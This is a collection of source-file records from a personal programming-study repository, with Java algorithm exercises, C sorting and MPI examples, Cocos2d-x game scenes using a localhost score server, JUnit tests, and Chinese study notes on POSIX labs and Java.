"is_vendor": false, "language": "Java", "length_bytes": 1321, "license_type": "permissive", "max_line_length": 76, "num_lines": 45, "path": "/java/projects/algorithms/chapter1/part1/Q23.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n/**\n * Q23\n */\n\nimport java.util.Scanner;\nimport java.util.Arrays;\n\n\npublic class Q23 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n\n if (scanner.hasNextInt()) {\n int arraySize = scanner.nextInt();\n int[] array = new int[arraySize];\n for (int i = 0; i < arraySize && scanner.hasNextInt(); i++)\n array[i] = scanner.nextInt();\n Arrays.sort(array);\n if (scanner.hasNext()) {\n boolean printIn = scanner.next().charAt(0) == '+';\n if (scanner.hasNextInt()) {\n int key = scanner.nextInt();\n int findResult = rank(key, array);\n if ((printIn && findResult >= 0) ||\n (!printIn && findResult <0))\n System.out.printf(\"key: %-10d index: %-10d\\n\", key, findResult);\n }\n }\n }\n scanner.close();\n }\n\n public static int rank(int key, int[] a) {\n return rank(key, a, 0, a.length - 1, 0);\n }\n\n public static int rank(int key, int[] a, int lo, int hi, int deepth) {\n if (lo > hi) return -1;\n System.out.printf(\"low: %-5d high:%-5d deepth:%-5d\\n\", lo, hi, deepth);\n int mid = lo + (hi - lo) / 2;\n if (key < a[mid]) return rank(key, a, lo, mid - 1, deepth + 1);\n else if (key > a[mid]) return rank(key, a, mid + 1, hi, deepth + 1);\n else return mid;\n }\n}" }, { "alpha_fraction": 0.593406617641449, "alphanum_fraction": 0.651098906993866, "avg_line_length": 20.41176414489746, "blob_id": "4eef0af408d5a9588999102c5e49790e5037327a", "content_id": "346042498b76371f252f0031a56a6cc1a68dd34e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "permissive", "max_line_length": 80, "num_lines": 17, "path": "/c/projects/POSIX/Lab2/2.1.cal_size.py", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\"\"\" cal_size.py\ncalcute the size n that cause fibonacci array value more than 4byte signed value\n\"\"\"\nVALUE = 1 << 31\nprint \"VALUE =\", VALUE\n\nsize, value = 1, 1\nleft, right = (0, 1)\n\nwhile value < VALUE:\n print size, value\n size = size + 1\n value = left + right\n left = right\n right = value\n\n# we can get that 48 value that will more than 2147483648\n" }, { "alpha_fraction": 0.48134326934814453, "alphanum_fraction": 0.49720150232315063, "avg_line_length": 23.571428298950195, "blob_id": "d06e74bf09b7da29a661a27ec55e1bfbb44028eb", "content_id": "ba7a782ce780453e980832ccf7689f60103df05d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1072, "license_type": "permissive", "max_line_length": 75, "num_lines": 42, "path": "/c/hardwork/tips/function_pointer.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint int_cmp(void const *left, void const *right) {\r\n return (*(int const *)left) - (*(int const *)right);\r\n}\r\n\r\nvoid int_swap(int *const left, int *const right) {\r\n if (*left != *right) {\r\n *left = *left + *right;\r\n *right = *left - *right;\r\n *left = *left - *right;\r\n }\r\n}\r\n\r\nvoid int_qsort(int *begin, int *end,\r\n int (*cmp_func)(void const *, void const *)) {\r\n int select_value = *begin;\r\n int i = 0;\r\n int j = (end - begin) - 1;\r\n\r\n while (i <= j) {\r\n while ((*cmp_func)(begin + i, &select_value) < 0) i++;\r\n while ((*cmp_func)(begin + j, &select_value) > 0) j--;\r\n if (i <= j) {\r\n int_swap(begin + i, begin + j);\r\n i++;\r\n j--;\r\n }\r\n }\r\n if (begin < begin + j) int_qsort(begin, begin + j + 1, cmp_func);\r\n if (begin + i < end - 1) int_qsort(begin + i, end, cmp_func);\r\n}\r\n\r\nint main() {\r\n int array[] = {4, 6, 7, 2, 1, 5, 3};\r\n int_qsort(array, array + 7, int_cmp);\r\n\r\n for (int i = 0; i < 7; i++) printf(\"index: %d value: %d\\n\", i, array[i]);\r\n\r\n return 0;\r\n}" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.71875, "avg_line_length": 15.5, "blob_id": "827fc6afe8bec8f4cb9eab6be19ac78b396197b0", "content_id": "d5f85b024acabe8cb5ebe36861bb27f63adf9908", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 32, "license_type": "permissive", "max_line_length": 17, "num_lines": 2, "path": "/R/harwork/packages/fun/tower_of_hanoi.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "library(\"fun\")\ntower_of_hanoi(3)" }, { "alpha_fraction": 0.6474885940551758, "alphanum_fraction": 0.6577625274658203, "avg_line_length": 28.795917510986328, "blob_id": "3cf98d3b3ac712782c33e0c6809c5b80fe88c957", "content_id": "9603c3afd2089cb04b23ee4f5d2d2008a9c2fe63", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4464, "license_type": "permissive", "max_line_length": 86, "num_lines": 147, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/GameScene.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "GB18030", "text": "#pragma execution_character_set(\"UTF-8\")\n#include \"GameScene.h\"\n#include \"json/rapidjson.h\"\n#include \"json/document.h\"\n#include \"json/writer.h\"\n#include \"json/stringbuffer.h\"\n#include <regex>\nusing std::regex;\nusing std::match_results;\nusing std::regex_match;\nusing std::cmatch;\nusing namespace rapidjson;\n\nUSING_NS_CC;\n\ncocos2d::Scene* GameScene::createScene() {\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 'layer' is an autorelease object\n\tauto layer = GameScene::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\nbool GameScene::init() {\n\tif (!Layer::init())\n\t{\n\t\treturn false;\n\t}\n\n\tSize size = Director::getInstance()->getVisibleSize();\n\tvisibleHeight = size.height;\n\tvisibleWidth = size.width;\n\n\tscore_field = TextField::create(\"Score\", \"Arial\", 30);\n\tscore_field->setPosition(Size(visibleWidth / 4, visibleHeight / 4 * 3));\n\tthis->addChild(score_field, 2);\n\n\tsubmit_button = Button::create();\n\tsubmit_button->setTitleText(\"Submit\");\n\tsubmit_button->setTitleFontSize(30);\n\tsubmit_button->setPosition(Size(visibleWidth / 4, visibleHeight / 4));\n\tthis->addChild(submit_button, 2);\n\n\trank_field = TextField::create(\"\", \"Arial\", 30);\n\trank_field->setPosition(Size(visibleWidth / 4 * 3, visibleHeight / 4 * 3));\n\tthis->addChild(rank_field, 2);\n\n\trank_button = Button::create();\n\trank_button->setTitleText(\"Rank\");\n\trank_button->setTitleFontSize(30);\n\trank_button->setPosition(Size(visibleWidth / 4 * 3, visibleHeight / 4));\n\tthis->addChild(rank_button, 2);\n\n\tsubmit_button->addClickEventListener([&](Ref* sender) {\n\t\tauto score_str = score_field->getStringValue();\n\t\tif (score_str.empty()) return;\n\t\tif (CCString::create(score_str)->intValue() > 0)\n\t\t{\n\t\t\tauto request = new HttpRequest();\n\t\t\tauto postData = \"score=\" + score_str;\n\n\t\t\tvector<string> headers;\n\t\t\theaders.push_back(\"Cookie: GAMESESSIONID=\" + Global::gameSessionId);\n\n\t\t\trequest->setUrl(\"http://localhost:8080/submit\");\n\t\t\trequest->setRequestType(HttpRequest::Type::POST);\n\t\t\trequest->setHeaders(headers);\n\t\t\trequest->setRequestData(postData.c_str(), strlen(postData.c_str()));\n\t\t\trequest->setResponseCallback([&](HttpClient *sender, HttpResponse * response) {\n\t\t\t\tif (!response) return;\n\t\t\t\tif (!response->isSucceed()) {\n\t\t\t\t\tscore_field->setText(\"(っ °Д °;)っ:是不是服务器没开\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\trapidjson::Document document;\n\t\t\t\tdocument.Parse<0>(Global::vectorChar2String(response->getResponseData()).c_str());\n\t\t\t\tif (document.HasParseError()) {\n\t\t\t\t\tscore_field->setText(\"(っ °Д °;)っ:后台君在玩蛇\");\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tif (document.IsObject() && document.HasMember(\"result\")) {\n\t\t\t\t\tif (document[\"result\"].GetBool()) {\n\t\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\t\tscore_field->setText(document[\"info\"].GetString());\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\t\tscore_field->setText(document[\"info\"].GetString());\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t});\n\t\t\tcocos2d::network::HttpClient::getInstance()->send(request);\n\t\t\trequest->release();\n\t\t}\n\t});\n\n\trank_button->addClickEventListener([&](Ref* sender) {\n\t\tauto request = new HttpRequest();\n\t\tchar* postData = \"top=10\";\n\t\tvector<string> headers;\n\t\theaders.push_back(\"Cookie: GAMESESSIONID=\" + Global::gameSessionId);\n\n\t\trequest->setUrl(\"http://localhost:8080/rank?top=10\");\n\t\trequest->setRequestType(HttpRequest::Type::GET);\n\t\trequest->setHeaders(headers);\n\t\t// request->setRequestData(postData, strlen(postData));\n\t\trequest->setResponseCallback([&](HttpClient *sender, HttpResponse * response) {\n\t\t\tif (!response) return;\n\t\t\tif (!response->isSucceed()) {\n\t\t\t\trank_field->setText(\"(っ °Д °;)っ:是不是服务器没开\");\n\t\t\t\treturn;\n\t\t\t}\n\t\t\trapidjson::Document document;\n\t\t\tdocument.Parse<0>(Global::vectorChar2String(response->getResponseData()).c_str());\n\t\t\tif (document.HasParseError()) {\n\t\t\t\trank_field->setText(\"(っ °Д °;)っ:后台君在玩蛇\");\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tif (document.IsObject() && document.HasMember(\"result\")) {\n\t\t\t\tif (document[\"result\"].GetBool()) {\n\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\tstring s = document[\"info\"].GetString();\n\t\t\t\t\t\tstd::replace(s.begin(), s.end(), '|', '\\n');\n\t\t\t\t\t\trank_field->setText(s);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tif (document.HasMember(\"info\")) {\n\t\t\t\t\t\trank_field->setText(document[\"info\"].GetString());\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\t\tcocos2d::network::HttpClient::getInstance()->send(request);\n\t\trequest->release();\n\t});\n\n\treturn true;\n}\n" }, { "alpha_fraction": 0.6965855956077576, "alphanum_fraction": 0.7100362181663513, "avg_line_length": 26.418439865112305, "blob_id": "53a73a116aae044fb0fda45d17d566ea7bd03c21", "content_id": "d0ac2e85cddbd897c81c848334cb3c35ef108f7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3866, "license_type": "permissive", "max_line_length": 76, "num_lines": 141, "path": "/java/projects/gridworld/Part3/Jumper/test/JumperTest.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import static org.junit.Assert.*;\nimport org.junit.Test;\nimport org.junit.Before;\nimport org.junit.BeforeClass;\n\nimport java.awt.Color;\nimport info.gridworld.grid.Grid;\nimport info.gridworld.grid.Location;\nimport info.gridworld.actor.Bug;\nimport info.gridworld.actor.Rock;\nimport info.gridworld.actor.Actor;\nimport info.gridworld.actor.Flower;\nimport info.gridworld.actor.ActorWorld;\n\n\npublic class JumperTest\n{\n\tprivate static Bug bug = new Bug();\n\tprivate static Rock rock = new Rock();\n\tprivate static Flower flower = new Flower();\n\tprivate static Jumper jumper = new Jumper();\n\tprivate static ActorWorld world = new ActorWorld();\n\n\t@BeforeClass\n\tpublic static void initial() throws Exception {\n\t\tworld.add(bug);\n\t\tworld.add(rock);\n\t\tworld.add(flower);\n\t\tworld.add(jumper);\n\t}\n\n\t@Before\n\tpublic void resetPosition() throws Exception {\n\t\tLocation loc = new Location(0, 0);\n\t\tjumper.moveTo(loc);\n\t\tjumper.setDirection(Location.NORTH);\n\t\tloc = new Location(9, 0);\n\t\tbug.moveTo(loc);\n\t\tbug.setDirection(Location.NORTH);\n\t\tloc = new Location(0, 9);\n\t\tflower.moveTo(loc);\n\t\tflower.setDirection(Location.NORTH);\n\t\tloc = new Location(9, 9);\n\t\trock.moveTo(loc);\n\t\trock.setDirection(Location.NORTH);\n\t}\n\n\t@Test \n\tpublic void test0_0_W()\n\t{\n\t\tLocation loc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t}\n\n\t@Test \n\tpublic void test0_1_W()\n\t{\n\t\tLocation loc = new Location(1, 0);\n\t\tjumper.moveTo(loc);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t}\n\n\t@Test \n\tpublic void test2_0_W()\n\t{\n\t\tLocation loc = new Location(2, 0);\n\t\tjumper.moveTo(loc);\n\t\tassertEquals(true, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t}\n\n\t@Test\n\tpublic void test2_0_W_Rock()\n\t{\n\t\tLocation loc = new Location(2, 0);\n\t\tjumper.moveTo(loc);\n\t\tloc = new Location(0, 0);\n\t\trock.moveTo(loc);\n\t\tloc = new Location(2, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(2, 0);\n\t\tassertEquals(true, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 2);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t\tloc = new Location(9, 9);\n\t\trock.moveTo(loc);\n\t}\n\n\t@Test\n\tpublic void test2_0_W_Flower()\n\t{\n\t\tLocation loc = new Location(2, 0);\n\t\tjumper.moveTo(loc);\n\t\tloc = new Location(0, 0);\n\t\tflower.moveTo(loc);\n\t\tloc = new Location(2, 0);\n\t\tassertEquals(true, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTH, jumper.getDirection());\n\t\tjumper.act();\n\t\tloc = new Location(0, 0);\n\t\tassertEquals(false, jumper.canMove());\n\t\tassertEquals(loc, jumper.getLocation());\n\t\tassertEquals(Location.NORTHEAST, jumper.getDirection());\n\t\t\n\t\tflower = new Flower();\n\t\tworld.add(flower);\n\t}\n}\n\n\n// in shell you can use \n// javac -classpath .:junit-4.9.jar JumperTest.java\n// java -classpath .:junit-4.9.jar -ea org.junit.runner.JUnitCore JumperTest\n" }, { "alpha_fraction": 0.7439024448394775, "alphanum_fraction": 0.7469512224197388, "avg_line_length": 14.619047164916992, "blob_id": "af97b21d37ac63cb2df721736e9e23ab767e197e", "content_id": "e091769223e23ff859b99defe6deef195f3ba08e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 328, "license_type": "permissive", "max_line_length": 55, "num_lines": 21, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/Global.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef GLOBAL_H\n#define GLOBAL_H\n\n#include <string>\n#include <vector>\nusing std::string;\nusing std::vector;\nclass Global\n{\npublic:\n\tGlobal();\n\t~Global();\n\tstatic string gameSessionId;\n\tstatic long score;\n\n\tstatic string vectorChar2String(vector<char> *buffer);\n\n\tstatic string getSessionIdFromHeader(string header);\n};\n\n#endif\n" }, { "alpha_fraction": 0.38881492614746094, "alphanum_fraction": 0.41411450505256653, "avg_line_length": 17.317073822021484, "blob_id": "a0f553bb67f8330dab45211ceaef05233c83c194", "content_id": "ae9a988b46749fd499bff191f3687c658747de2e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 751, "license_type": "permissive", "max_line_length": 34, "num_lines": 41, "path": "/c/hardwork/hardway/2.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint left[500005], right[500005];\nint n, m, z, x, y, t;\n\nvoid dodo(int n, int m) {\n for (int i = 0; i <= n; i++) {\n left[i] = i - 1;\n right[i] = i + 1;\n }\n while (m--) {\n scanf(\"%d %d %d\", &z, &x, &y);\n right[left[x]] = right[x];\n left[right[x]] = left[x];\n if (1 == z) {\n right[left[y]] = x;\n left[x] = left[y];\n left[y] = x;\n right[x] = y;\n } else {\n left[right[y]] = x;\n right[x] = right[y];\n right[y] = x;\n left[x] = y;\n }\n }\n int index = 0;\n for (int i = 0; i < n; i++) {\n index = right[index];\n printf(\"%d \", index);\n }\n putchar('\\n');\n}\n\nint main() {\n scanf(\"%d\", &t);\n while (t--) {\n scanf(\"%d %d\", &n, &m);\n dodo(n, m);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.7473233342170715, "alphanum_fraction": 0.7708779573440552, "avg_line_length": 28.25, "blob_id": "354bf2ae8e0c53f14ef01be1360301e8af1375c6", "content_id": "0c70594e85bd0dea6635af45238802f1264d1cf0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 661, "license_type": "permissive", "max_line_length": 275, "num_lines": 16, "path": "/c/projects/POSIX/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C POSIX library\n> The C POSIX library is a specification of a C standard library for POSIX systems. It was developed at the same time as the ANSI C standard. Some effort was made to make POSIX compatible with standard C; POSIX includes additional functions to those introduced in standard C.\n\n## Lab1 \n1. 加深对进程概念的理解,明确进程和程序的区别。进一步认识并发执行的实质。\n2. 了解信号处理。\n3. 认识进程间通信(IPC):进程间共享内存\n4. 实现shell:了解程序运行。\n\n## Lab2\n1. 用线程生成Fibonacci数列\n2. 多线程矩阵乘法\n\n## Lab3\n1. 生产者消费者问题\n2. 读者写者问题" }, { "alpha_fraction": 0.5548872351646423, "alphanum_fraction": 0.6112781763076782, "avg_line_length": 26.6875, "blob_id": "ce1f1fb9e441423f411bb59bf8cd61c88f6ea723", "content_id": "ccfb17fec19e41b52b7c5f149fcba1e8244bdb03", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1330, "license_type": "permissive", "max_line_length": 96, "num_lines": 48, "path": "/c/projects/MPI/hardway/MPI_pack.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n// [Surface-Pro-3:8772] *** An error occurred in MPI_Unpack\n// [Surface-Pro-3:8772] *** reported by process [1590624257,1]\n// [Surface-Pro-3:8772] *** on communicator MPI_COMM_WORLD\n// [Surface-Pro-3:8772] *** MPI_ERR_TRUNCATE: message truncated\n// [Surface-Pro-3:8772] *** MPI_ERRORS_ARE_FATAL (processes in this communicator will now abort,\n// [Surface-Pro-3:8772] *** and potentially your MPI job)\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, source;\n MPI_Status status;\n int i, j, position;\n int k[2];\n int buf[1000];\n\n MPI_Init(&argc, &argv);\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n i = 1;\n j = 2;\n\n if (myid == 0) {\n position = 0;\n\n MPI_Pack(&i, 1, MPI_INT, buf, 1000, &position, MPI_COMM_WORLD);\n MPI_Pack(&j, 1, MPI_INT, buf, 1000, &position, MPI_COMM_WORLD);\n\n MPI_Send(buf, position, MPI_PACKED, 1, 99, MPI_COMM_WORLD);\n } else if (myid == 1) {\n MPI_Recv(k, 2, MPI_INT, 0, 99, MPI_COMM_WORLD, &status);\n\n position = 0;\n i = j = 0;\n\n // your code here\n MPI_Unpack(k, 2, &position, &i, 1, MPI_INT, MPI_COMM_WORLD);\n MPI_Unpack(k, 2, &position, &j, 1, MPI_INT, MPI_COMM_WORLD);\n // end of your code\n\n printf(\"The number is %d and %d\", i, j);\n }\n\n MPI_Finalize();\n return 0;\n}\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.75, "avg_line_length": 72, "blob_id": "9ecc282fdcbc6223e0367b2a67b1b1e2f5a490a9", "content_id": "f7de81d047a7b78862a11824c9f7b46490f9528d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 72, "license_type": "permissive", "max_line_length": 72, "num_lines": 1, "path": "/bash/hardwork/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "Some code when I learn [TLCL book](http://billie66.github.io/TLCL/book/)" }, { "alpha_fraction": 0.41737648844718933, "alphanum_fraction": 0.4412265717983246, "avg_line_length": 21.615385055541992, "blob_id": "7dc1e4d0b5618379b383026814ddc872cbabba7d", "content_id": "aa913dd4ce4db718dfa87e5aa803e6a355287354", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 587, "license_type": "permissive", "max_line_length": 59, "num_lines": 26, "path": "/java/projects/algorithms/chapter1/part1/Q30.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q30\n */\npublic class Q30 {\n public static void main(String[] args) {\n int size = Integer.parseInt(args[0]);\n boolean [][] table = new boolean[size][size];\n\n for (int i = 0; i < size; i++) {\n for (int j = 0; j < size; j++) {\n table[i][j] = !(i != 0 && j!= 0 && gcd(i, j) != 1);\n }\n }\n\n for (int i = 0; i < size; i++) {\n for (int j = 0; j < size; j++) {\n System.out.printf(\"%5b \", table[i][j]); \n }\n System.out.printf(\"\\n\"); \n }\n }\n\n public static int gcd(int a, int b) {\n return a % b == 0 ? b : gcd(b, a % b);\n }\n}" }, { "alpha_fraction": 0.45869946479797363, "alphanum_fraction": 0.47803163528442383, "avg_line_length": 20.11111068725586, "blob_id": "6ddf22a3787de32a96767b4b8f0f488aada1f3c5", "content_id": "fa3db056f6cb21022199af59855421c9e3edcd32", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 569, "license_type": "permissive", "max_line_length": 47, "num_lines": 27, "path": "/java/projects/algorithms/chapter1/part1/Q31.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Random;\n\n/**\n * Q31\n */\npublic class Q31 {\n public static void main(String[] args) {\n int n = Integer.parseInt(args[0]);\n double p = Double.parseDouble(args[1]);\n\n boolean [][] table = new boolean[n][n];\n\n for (int i = 0; i < n; i++) {\n for (int j = 0; j < n; j++) {\n Random random = new Random();\n table[i][j] = random.nextDouble() < p;\n }\n }\n\n for (int i = 0; i < n; i++) {\n for (int j = 0; j < n; j++) {\n System.out.printf(\"%5b \", table[i][j]);\n }\n System.out.print(\"\\n\");\n }\n }\n}" }, { "alpha_fraction": 0.5386138558387756, "alphanum_fraction": 0.5432343482971191, "avg_line_length": 36.849998474121094, "blob_id": "d0a9004f7890ca803ff5d0172a175908ae142a80", "content_id": "cbf9bb1127729aa28534a8f4e19772f6d1d8755c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3249, "license_type": "permissive", "max_line_length": 140, "num_lines": 40, "path": "/java/docs/ThinkInJava.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Think-In-Java\n> 起因是需要先打好Java基础,那就一定要多看书。\n\n## 前言\n1. Java的目标是减轻程序员的负担。\n2. 编程效率的提高使得大量网络程序的设计成为可能,增加了人们的通信带宽。\n\n## 对象入门\n\n1. 抽象的进步,从“命令式”语言(如C,FORTRAN)到特殊的建模语言(如LISP与表,APL与算法)再到面向对象的程序设计(以下简称OOP),使用对象的组合来解决问题。\n2. 在OOP中,对象是包含数据和操作的集合。程序是一大堆对象的组合,通过对象间的消息传递(互相调用接口)来推进执行。可以通过封装当前对象制造出新的对象,同一类对象的相同的操作在封装后得到保留并可以修改。\n3. 设置类边界:public private friendly protected\n```\n | Class | Package | Subclass | Subclass | World\n | | |(same pkg)|(diff pkg)| \n————————————+———————+—————————+——————————+——————————+————————\npublic | + | + | + | + | + \n————————————+———————+—————————+——————————+——————————+————————\nprotected | + | + | + | + | \n————————————+———————+—————————+——————————+——————————+————————\nno modifier | + | + | + | | \n————————————+———————+—————————+——————————+——————————+————————\nprivate | + | | | | \n\n+ : accessible\nblank : not accessible\n```\n4. 实现多形性的方法叫做动态绑定。\n5. 抽象的基础类和接口:abstract interface\n\n\n## 对象入门\n\n+ 大多数程序员的首要任务是用现有的对象解决自己的问题,事实上,只有相当少的“专家”能设计出让别人享用的对象。\n+ 解决问题的复杂程度直接取决于抽象的种类及质量\n + 许多“命令式”语言(如FORTRAN,BASIC和C)是对汇编语言的一种抽象。\n + 一些早期语言来说,如LISP和APL,它们的做法是“从不同的角度观察世界”——“所有问题都归纳为列表”或“所有问题都归纳为算法”。PROLOG则将所有问题都归纳为决策链。\n + 面向对象的程序设计在此基础上则跨出了一大步,程序员可利用一些工具表达问题空间内的元素。\n+ 从技术角度说,OOP(面向对象程序设计)只是涉及抽象的数据类型、继承以及多形性。\n+ 单根结构中的所有对象都有一个通用接口,所以它们最终都属于相同的类型。单根结构中的所有对象(比如所有Java对象)都可以保证拥有一些特定的功能。利用单根结构,我们可以更方便地实现一个垃圾收集器。与此有关的必要支持可安装于基础类中,而垃圾收集器可将适当的消息发给系统内的任何对象。\n\n" }, { "alpha_fraction": 0.6365979313850403, "alphanum_fraction": 0.6391752362251282, "avg_line_length": 20.61111068725586, "blob_id": "a847f3e5026dc0bafb1d6631765804680d465ffb", "content_id": "319899017eeada0cb1d163e63cfbf1ab95dea1d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 428, "license_type": "permissive", "max_line_length": 61, "num_lines": 18, "path": "/c/projects/MPI/hardway/MPI_name.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int len;\n char name[MPI_MAX_PROCESSOR_NAME];\n MPI_Init(&argc, &argv);\n\n // int MPI_Get_processor_name ( char *name, int *resultlen)\n // char *name : 实际节点的唯一说明字;\n // int *resultlen:在name中返回结果的长度;\n MPI_Get_processor_name(name, &len);\n\n printf(\"Hello, world. I am %s.\\n\", name);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.6494413614273071, "alphanum_fraction": 0.6764432191848755, "avg_line_length": 27.236841201782227, "blob_id": "11064d67664edc856b3825657daff62be5305d7a", "content_id": "8239759218012b3fb98d86381433f6fbf642b514", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2150, "license_type": "permissive", "max_line_length": 115, "num_lines": 76, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week10/Classes/MenuSence.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"MenuSence.h\"\n#include \"GameSence.h\"\nUSING_NS_CC;\n\nScene* MenuSence::createScene()\n{\n // 'scene' is an autorelease object\n auto scene = Scene::create();\n\n // 'layer' is an autorelease object\n auto layer = MenuSence::create();\n\n // add layer as a child to scene\n scene->addChild(layer);\n\n // return the scene\n return scene;\n}\n\n// on \"init\" you need to initialize your instance\nbool MenuSence::init()\n{\n\n if ( !Layer::init() )\n {\n return false;\n }\n\n Size visibleSize = Director::getInstance()->getVisibleSize();\n Vec2 origin = Director::getInstance()->getVisibleOrigin();\n\n\tauto bg_sky = Sprite::create(\"menu-background-sky.jpg\");\n\tbg_sky->setPosition(Vec2(visibleSize.width / 2 + origin.x, visibleSize.height / 2 + origin.y + 150));\n\tthis->addChild(bg_sky, 0);\n\n\tauto bg = Sprite::create(\"menu-background.png\");\n\tbg->setPosition(Vec2(visibleSize.width / 2 + origin.x, visibleSize.height / 2 + origin.y - 60));\n\tthis->addChild(bg, 0);\n\n\tauto miner = Sprite::create(\"menu-miner.png\");\n\tminer->setPosition(Vec2(150 + origin.x, visibleSize.height / 2 + origin.y - 60));\n\tthis->addChild(miner, 1);\n\n\tauto leg = Sprite::createWithSpriteFrameName(\"miner-leg-0.png\");\n\tAnimate* legAnimate = Animate::create(AnimationCache::getInstance()->getAnimation(\"legAnimation\"));\n\tleg->runAction(RepeatForever::create(legAnimate));\n\tleg->setPosition(110 + origin.x, origin.y + 102);\n\tthis->addChild(leg, 1);\n\n\tauto stone = Sprite::create(\"menu-start-gold.png\");\n\tstone->setPosition(700, 150);\n\tthis->addChild(stone, 1);\n\n\n\t// my job now \n\tauto start = MenuItemImage::create(\n\t\t\"start-0.png\",\n\t\t\"start-1.png\",\n\t\tCC_CALLBACK_1(MenuSence::menuStartCallback, 